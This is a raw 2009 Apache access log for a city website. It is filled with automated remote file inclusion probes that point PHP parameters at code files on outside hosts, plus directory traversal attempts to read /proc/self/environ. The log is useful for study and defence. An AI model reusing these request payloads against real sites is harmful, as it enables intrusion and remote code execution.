196.25.27.90 - - [01/Jul/2009:01:04:25 -0700] "GET /logs/access_081001.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:01:04:25 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:01:05:50 -0700] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:01:05:50 -0700] "GET /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:01:05:50 -0700] "GET /logs/access_080601.log%20%20//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:01:05:50 -0700] "GET /logs/access_080531.log%20%20//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.232.68.137 - - [01/Jul/2009:01:06:07 -0700] "GET /logs/access_080330.log%20%20/lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.232.68.137 - - [01/Jul/2009:01:06:07 -0700] "GET /lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.232.68.137 - - [01/Jul/2009:01:06:07 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.232.68.137 - - [01/Jul/2009:01:06:07 -0700] "GET /logs/access_080531.log%20%20/lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:01:06:12 -0700] "GET /logs/access_080601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:01:06:33 -0700] "GET /logs/access_080601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.9.234 - - [01/Jul/2009:01:06:43 -0700] "GET /include/mail.inc.php?skin_board_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.9.234 - - [01/Jul/2009:01:06:44 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.9.234 - - [01/Jul/2009:01:06:44 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.151.217.29 - - [01/Jul/2009:01:06:59 -0700] "GET /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.151.217.29 - - [01/Jul/2009:01:06:59 -0700] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.151.217.29 - - [01/Jul/2009:01:06:59 -0700] "GET /logs/access_080531.log%20%20//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.151.217.29 - - [01/Jul/2009:01:06:59 -0700] "GET /logs/access_080601.log%20%20//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:01:07:28 -0700] "GET /logs/access_080531.log//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:01:07:28 -0700] "GET /logs/access_080601.log//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.232.68.137 - - [01/Jul/2009:01:07:39 -0700] "GET /lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.232.68.137 - - [01/Jul/2009:01:07:39 -0700] "GET /logs/access_080330.log%20%20/lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.232.68.137 - - [01/Jul/2009:01:07:39 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.232.68.137 - - [01/Jul/2009:01:07:40 -0700] "GET /logs/access_080531.log%20%20/lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.151.217.29 - - [01/Jul/2009:01:08:09 -0700] "GET /logs/access_080601.log//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.151.217.29 - - [01/Jul/2009:01:08:09 -0700] "GET /logs/access_080531.log//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:01:09:00 -0700] "GET /logs/access_080601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.9.234 - - [01/Jul/2009:01:09:17 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.227.193.198 - - [01/Jul/2009:01:10:33 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.227.193.198 - - [01/Jul/2009:01:10:33 -0700] "GET /include/mail.inc.php?skin_board_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.227.193.198 - - [01/Jul/2009:01:10:33 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
65.23.158.226 - - [01/Jul/2009:01:10:43 -0700] "GET /logs/access_080531.log%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:01:12:44 -0700] "GET /logs/access_080601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:01:16:50 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:01:16:50 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:01:17:18 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.38.187.136 - - [01/Jul/2009:01:17:50 -0700] "GET /logs/access_080330.log/config.php?inc_dir=http://www.1-zigzag.ru/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
208.38.187.136 - - [01/Jul/2009:01:17:50 -0700] "GET /config.php?inc_dir=http://www.1-zigzag.ru/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
208.38.187.136 - - [01/Jul/2009:01:17:50 -0700] "GET /logs/config.php?inc_dir=http://www.1-zigzag.ru/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
60.50.11.66 - - [01/Jul/2009:01:18:51 -0700] "GET ///?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.50.11.66 - - [01/Jul/2009:01:18:51 -0700] "GET /logs////?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 200 4234 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.50.11.66 - - [01/Jul/2009:01:18:52 -0700] "GET /logs/access_080531.log////?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.38.136.16 - - [01/Jul/2009:01:20:52 -0700] "GET /logs/access_080330.log/config.php?inc_dir=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
218.38.136.16 - - [01/Jul/2009:01:20:52 -0700] "GET /logs/access_080330.log/config.php?inc_dir=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
218.38.136.16 - - [01/Jul/2009:01:20:52 -0700] "GET /config.php?inc_dir=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
218.38.136.16 - - [01/Jul/2009:01:20:53 -0700] "GET /config.php?inc_dir=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
218.38.136.16 - - [01/Jul/2009:01:20:53 -0700] "GET /logs/config.php?inc_dir=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
218.38.136.16 - - [01/Jul/2009:01:20:53 -0700] "GET /logs/config.php?inc_dir=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
58.227.193.198 - - [01/Jul/2009:01:22:33 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
65.55.106.140 - - [01/Jul/2009:01:23:28 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
60.50.11.66 - - [01/Jul/2009:01:23:58 -0700] "GET /logs/access_080531.log%20%20////?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
209.151.224.247 - - [01/Jul/2009:01:24:09 -0700] "GET /logs/access_080531.log//common.php?include_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
209.151.224.247 - - [01/Jul/2009:01:24:09 -0700] "GET /logs//common.php?include_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
209.151.224.247 - - [01/Jul/2009:01:24:09 -0700] "GET /common.php?include_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:01:25:06 -0700] "GET /skin/zero_vote/admin.php?dir=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:01:25:06 -0700] "GET /logs/access_080330.log//skin/zero_vote/admin.php?dir=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:01:25:06 -0700] "GET /logs//skin/zero_vote/admin.php?dir=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:01:25:06 -0700] "GET /logs/access_080330.log/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:01:25:06 -0700] "GET /errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:01:25:06 -0700] "GET /logs/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:01:25:07 -0700] "GET /logs/access_080330.log//skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:01:25:07 -0700] "GET /skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:01:25:07 -0700] "GET /logs//skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:01:25:07 -0700] "GET /skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:01:25:07 -0700] "GET /logs/access_080330.log//skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:01:25:07 -0700] "GET /logs//skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:01:26:04 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
119.235.24.68 - - [01/Jul/2009:01:27:24 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:27:58 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:28:00 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:28:01 -0700] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:28:01 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:28:01 -0700] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:28:03 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.94.56.39 - - [01/Jul/2009:01:28:12 -0700] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX%5BINCLUDE_PATH%5D=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.94.56.39 - - [01/Jul/2009:01:28:12 -0700] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX%5BINCLUDE_PATH%5D=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.94.56.39 - - [01/Jul/2009:01:28:12 -0700] "GET /logs/access.log%20%20//redaxo/include/addons/import_export/pages/index.inc.php?REX%5BINCLUDE_PATH%5D=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:30:47 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:30:47 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:30:48 -0700] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:01:32:52 -0700] "GET /include.php?path[docroot]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:01:32:52 -0700] "GET /logs/access_080330.log//include.php?path[docroot]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:01:32:52 -0700] "GET /logs//include.php?path[docroot]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:01:32:53 -0700] "GET /logs/access_080330.log//include.php?path[docroot]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:01:32:53 -0700] "GET /include.php?path[docroot]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:01:32:53 -0700] "GET /logs//include.php?path[docroot]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:01:33:34 -0700] "GET /logs/access_080531.log//include.php?path[docroot]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:01:33:51 -0700] "GET /logs/access_080531.log//include.php?path[docroot]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:34:56 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://setan.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:34:56 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://setan.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:34:56 -0700] "GET /logs/access_080531.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://setan.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.94.56.39 - - [01/Jul/2009:01:34:56 -0700] "GET /logs/access.log//redaxo/include/addons/import_export/pages/index.inc.php?REX%5BINCLUDE_PATH%5D=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:01:35:06 -0700] "GET /logs/access_080330.log%20%20//include.php?path[docroot]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:01:35:11 -0700] "GET /logs/access_080531.log%20%20//include.php?path[docroot]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:35:13 -0700] "GET /logs/access_080330.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://setan.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
213.238.52.141 - - [01/Jul/2009:01:36:04 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.238.52.141 - - [01/Jul/2009:01:36:04 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.238.52.141 - - [01/Jul/2009:01:36:04 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:01:37:03 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:01:37:07 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:01:37:08 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:38:18 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:38:18 -0700] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:38:18 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:38:18 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:38:19 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:38:20 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:38:20 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:38:20 -0700] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:38:20 -0700] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:01:39:02 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:01:39:02 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:01:39:02 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:01:39:33 -0700] "GET /logs/access_080330.log%20%20//include.php?path[docroot]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:01:39:37 -0700] "GET /logs/access_080531.log%20%20//include.php?path[docroot]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
